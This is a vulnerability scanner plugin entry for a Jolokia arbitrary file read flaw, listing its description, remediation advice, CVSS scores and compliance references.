Detections
Analytics
Jolokia Arbitrary File Read
high Web App Scanning Plugin ID 113200
Language:
Synopsis
Jolokia Arbitrary File ReadDescription
Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. Jolokia includes a compilerDirectivesAdd action, which allows an unauthenticated attacker to read arbitrary files on the server.Solution
If the jolokia endpoint is not needed it should be disabled. If the jolokia endpoint is required it should be secured using Spring Security.See Also
https://thinkloveshare.com/en/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
Plugin Details
Severity: High
ID: 113200
Type: remote
Family: Component Vulnerability
Published: 3/24/2022
Updated: 3/13/2023
Scan Template: api, basic, full, pci, scan
Risk Information
VPR
Risk Factor: Medium
Score: 5.1
CVSS v2
Risk Factor: Medium
Base Score: 5
Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS Score Source: Tenable
CVSS v3
Risk Factor: High
Base Score: 7.5
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS Score Source: Tenable
Vulnerability Information
CPE: cpe:2.3:a:jolokia:jolokia:*:*:*:*:*:*:*:*
Exploit Available: true
Exploit Ease: Exploits are available
Reference Information
CWE: 22
OWASP: 2010-A4, 2013-A4, 2013-A9, 2017-A5, 2017-A9, 2021-A1, 2021-A6
WASC: Path Traversal
DISA STIG: APSC-DV-002560, APSC-DV-002630
HIPAA: 164.306(a)(1), 164.306(a)(2)
ISO: 27001-A.14.2.5
NIST: sp800_53-CM-6b, sp800_53-SI-10
OWASP API: 2019-API7, 2023-API8
OWASP ASVS: 4.0.2-12.3.1, 4.0.2-14.2.1